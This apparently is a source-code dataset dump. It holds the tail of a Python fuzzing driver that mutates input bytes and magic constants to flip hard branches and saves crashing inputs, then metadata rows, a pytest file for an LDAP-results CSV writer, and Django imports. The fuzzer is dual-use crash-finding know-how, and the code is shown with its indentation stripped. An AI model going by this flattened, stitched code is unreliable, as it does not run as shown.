if (init_distance >= 0 and hit == 2) or (init_distance < 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance >= 0 and hit == 2) or (init_distance < 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
if br_type == 5 or br_type == 6:
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance < 0 and init_distance >= 0) or (distance >= 0 and init_distance < 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance < 0 and init_distance >= 0) or (distance >= 0 and init_distance < 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance < 0 and init_distance >= 0) or (distance >= 0 and init_distance < 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance < 0:
# construct an equal case to satisfy >= case
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct a < case to satisfy the < case
if constant_loc == 2:
if int(constant_magic) == 0:
continue
magic_ori = struct.pack("@Q", int(constant_magic)-1)
elif constant_loc == 1:
magic_ori = struct.pack("@Q", int(constant_magic)+1)
else:
print("error")
sys.exit(0)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance < 0 and hit == 2) or (init_distance >= 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance < 0 and hit == 2) or (init_distance >= 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
if br_type == 8 or br_type == 9:
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance <= 0 and init_distance > 0) or (distance > 0 and init_distance <= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate candidate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance <= 0 and init_distance > 0) or (distance > 0 and init_distance <= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance <= 0 and init_distance > 0) or (distance > 0 and init_distance <= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance > 0:
# construct an equal value to satisfy the <= branch
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct a value that satisfies the > branch
if constant_loc == 2:
magic_ori = struct.pack("@Q", int(constant_magic)+1)
elif constant_loc == 1:
if int(constant_magic) == 0:
continue
magic_ori = struct.pack("@Q", int(constant_magic)-1)
else:
print("error")
sys.exit(0)
# truncate the packed value to the common LLVM integer operand widths (1, 2, 4 and 8 bytes)
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance <= 0 and hit == 2) or (init_distance > 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance <= 0 and hit == 2) or (init_distance > 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
if br_type == 10 or br_type == 12:
seed_id = v[0]
if isinstance(v[0], tuple):
seed_id = v[0][0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
continue
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance == 0 and init_distance != 0) or (distance != 0 and init_distance == 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# convert the hex string constant_magic into a list of byte values
magic = []
for num in range(int(len(constant_magic)/2)):
magic.append(int('0x'+constant_magic[num*2:num*2+2],0))
magic_rev = magic.copy()
magic_rev.reverse()
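# try the magic bytes both forward from each hot offset and reversed ending at the hot offset, to cover either byte order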
for hot_offset in hot_offsets:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
if br_type == 10:
tmp_seed[hot_offset+len(magic)] = 0
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
# run inputs and check results
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance == 0 and hit == 2) or (init_distance != 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic_rev):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic_rev)+1 :hot_offset+1] = magic_rev
if br_type == 10:
if hot_offset >= len(magic_rev):
tmp_seed[hot_offset-len(magic_rev)] = 0
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance == 0 and hit == 2) or (init_distance != 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
crack_failed_but_I_tried = list(unexplored.keys())
pickle.dump(crack_failed_but_I_tried, open("crack_failed",'wb'))
with open("mut_cnt", 'w') as f:
f.write(str(mut_cnt))
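# Entry point: alternate indefinitely between edge-coverage (ec) and context-sensitive (ctx)
# fuzzing runs; the branch-cracking pass above can be re-enabled via the commented-out crack() call.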
def main():
argvv = sys.argv[1:]
tmp_argvv = argvv.copy()
while True:
# only save inputs that find new ec edges.
print("%%%%%%%%%%%%% run ec mode")
tmp_argvv[6] = argvv[6]+"_ec"
subprocess.run(['./mtfuzz']+tmp_argvv)
# save inputs that find new ec edges or ctx edges
print("%%%%%%%%%%%%% run ctx mode")
tmp_argvv[6] = argvv[6]+"_ctx"
subprocess.run(['./mtfuzz']+tmp_argvv)
# mutate hot bytes using intercepted operands
# print("%%%%%%%%%%%% crack hard branch")
# crack(tmp_argvv, argvv)
if __name__== "__main__":
main()
| 51.156849
| 240
| 0.433839
| 8,040
| 74,689
| 3.839055
| 0.041045
| 0.025465
| 0.02391
| 0.03188
| 0.90692
| 0.897071
| 0.892341
| 0.885473
| 0.882071
| 0.878669
| 0
| 0.030867
| 0.443492
| 74,689
| 1,459
| 241
| 51.191912
| 0.711729
| 0.06906
| 0
| 0.898778
| 0
| 0
| 0.090446
| 0
| 0
| 0
| 0
| 0.000685
| 0
| 1
| 0.002618
| false
| 0
| 0.009599
| 0
| 0.012216
| 0.050611
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3729123cf1f12692369b66319963b134b311c09c
| 5,845
|
py
|
Python
|
Tests/csv_test.py
|
Modusmundi/Paustachio
|
8d73d2d36a70cdf5308f020b3db62e408231390d
|
[
"Apache-2.0"
] | null | null | null |
Tests/csv_test.py
|
Modusmundi/Paustachio
|
8d73d2d36a70cdf5308f020b3db62e408231390d
|
[
"Apache-2.0"
] | null | null | null |
Tests/csv_test.py
|
Modusmundi/Paustachio
|
8d73d2d36a70cdf5308f020b3db62e408231390d
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import csv
import csv_tools
import os
good_csv = 'good_csv.csv'
results = 'results.csv'
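# assumption from the tests below: results.csv is the writer's default output; good_csv.csv is used when a filename is supplied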
"""
We need to test that in the event of no supplied filename, a default file is generated.
"""
def test_default_csv_generation():
if os.path.exists(results):
print("Cleaned up results file from previous test.")
os.remove(results)
sample_results = [{'name': 'A Searched Named Example', 'group': 'Group 1', 'search': 'ou=people,o=example',
'filter': '(objectclass=*)', 'scope': 'sub', 'total': 2002,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 2 - Electric Boogaloo', 'group': 'group 1',
'search': 'ou=people,o=example', 'filter': '(st=MI)', 'scope': 'sub', 'total': 51,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 3 - The Search Strikes Back', 'group': 'group 2',
'search': 'ou=people,o=example', 'filter': '(&(l=Rockford)(st=NM))', 'scope': 'sub', 'total': 1,
'timestamp': 'Sun Oct 21 21:35:12 2018'}]
file_generated = csv_tools.csv_write.write(search_results=sample_results)
assert os.path.isfile(results) == 1
"""
We need to test that when a file is generated with multiple entries, that the entries come back appropriately.
"""
def test_rowcount_truthiness():
resultcounter = 0
if os.path.exists(results):
print("Rowcount truthiness - Cleaned up results file from previous test.")
os.remove(results)
sample_results = [{'name': 'A Searched Named Example', 'group': 'Group 1', 'search': 'ou=people,o=example',
'filter': '(objectclass=*)', 'scope': 'sub', 'total': 2002,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 2 - Electric Boogaloo', 'group': 'group 1',
'search': 'ou=people,o=example', 'filter': '(st=MI)', 'scope': 'sub', 'total': 51,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 3 - The Search Strikes Back', 'group': 'group 2',
'search': 'ou=people,o=example', 'filter': '(&(l=Rockford)(st=NM))', 'scope': 'sub', 'total': 1,
'timestamp': 'Sun Oct 21 21:35:12 2018'}]
file_generated = csv_tools.csv_write.write(search_results=sample_results)
with open(file=results, mode='r', newline='') as csvfile:
resultsreader = csv.reader(csvfile, dialect='excel', quotechar='"', doublequote=True,
quoting=csv.QUOTE_MINIMAL)
for row in resultsreader:
resultcounter += row.count('sub')
csvfile.close()
assert resultcounter == 3
"""
We need to test that in the event that a filename is supplied, that file is generated with an appropriate name.
"""
def test_bespoke_csv_generation():
if os.path.exists(good_csv):
print("Bespoke CSV generation - Cleaned up results file from previous test.")
os.remove(good_csv)
sample_results = [{'name': 'A Searched Named Example', 'group': 'Group 1', 'search': 'ou=people,o=example',
'filter': '(objectclass=*)', 'scope': 'sub', 'total': 2002,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 2 - Electric Boogaloo', 'group': 'group 1',
'search': 'ou=people,o=example', 'filter': '(st=MI)', 'scope': 'sub', 'total': 51,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 3 - The Search Strikes Back', 'group': 'group 2',
'search': 'ou=people,o=example', 'filter': '(&(l=Rockford)(st=NM))', 'scope': 'sub', 'total': 1,
'timestamp': 'Sun Oct 21 21:35:12 2018'}]
file_generated = csv_tools.csv_write.write(search_results=sample_results, save_file=good_csv)
assert os.path.isfile(good_csv) == 1
"""
We need to test that in the event of no CSV existing, appropriate headers are generated when the file is made.
"""
def test_good_header_testing():
rowcounter = 0
rowholder = {}
if os.path.exists(good_csv):
print("Good header testing - Cleaned up results file from previous test.")
os.remove(good_csv)
sample_results = [{'name': 'A Searched Named Example', 'group': 'Group 1', 'search': 'ou=people,o=example',
'filter': '(objectclass=*)', 'scope': 'sub', 'total': 2002,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 2 - Electric Boogaloo', 'group': 'group 1',
'search': 'ou=people,o=example', 'filter': '(st=MI)', 'scope': 'sub', 'total': 51,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 3 - The Search Strikes Back', 'group': 'group 2',
'search': 'ou=people,o=example', 'filter': '(&(l=Rockford)(st=NM))', 'scope': 'sub', 'total': 1,
'timestamp': 'Sun Oct 21 21:35:12 2018'}]
file_generated = csv_tools.csv_write.write(search_results=sample_results, save_file=good_csv)
with open(file=good_csv, mode='r', newline='') as csvfile:
resultsreader = csv.reader(csvfile, dialect='excel', quotechar='"', doublequote=True,
quoting=csv.QUOTE_MINIMAL)
for row in resultsreader:
rowholder[rowcounter] = row
rowcounter += 1
csvfile.close()
assert rowholder[0] == ['Name', 'Group', 'Time of Search', 'Search DN', 'Filter Used', 'Search Scope', 'Record Count']
| 51.725664
| 122
| 0.570402
| 724
| 5,845
| 4.537293
| 0.165746
| 0.018265
| 0.051142
| 0.054795
| 0.785388
| 0.785388
| 0.756164
| 0.740335
| 0.73242
| 0.73242
| 0
| 0.046956
| 0.274936
| 5,845
| 112
| 123
| 52.1875
| 0.728174
| 0
| 0
| 0.707317
| 1
| 0
| 0.391474
| 0.016311
| 0
| 0
| 0
| 0
| 0.04878
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.097561
| 0.04878
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ef4a7a052a49c48acbb3433f0cff2cd222d2c79
| 3,398
|
py
|
Python
|
tree/views.py
|
oldevgeny/LegalTech-bot
|
91eb222afe9477a1cdcb9465152781bfacc11e23
|
[
"Apache-2.0"
] | null | null | null |
tree/views.py
|
oldevgeny/LegalTech-bot
|
91eb222afe9477a1cdcb9465152781bfacc11e23
|
[
"Apache-2.0"
] | null | null | null |
tree/views.py
|
oldevgeny/LegalTech-bot
|
91eb222afe9477a1cdcb9465152781bfacc11e23
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
from django.db import transaction
from django.http import HttpResponseRedirect
from django.contrib.contenttypes.models import ContentType
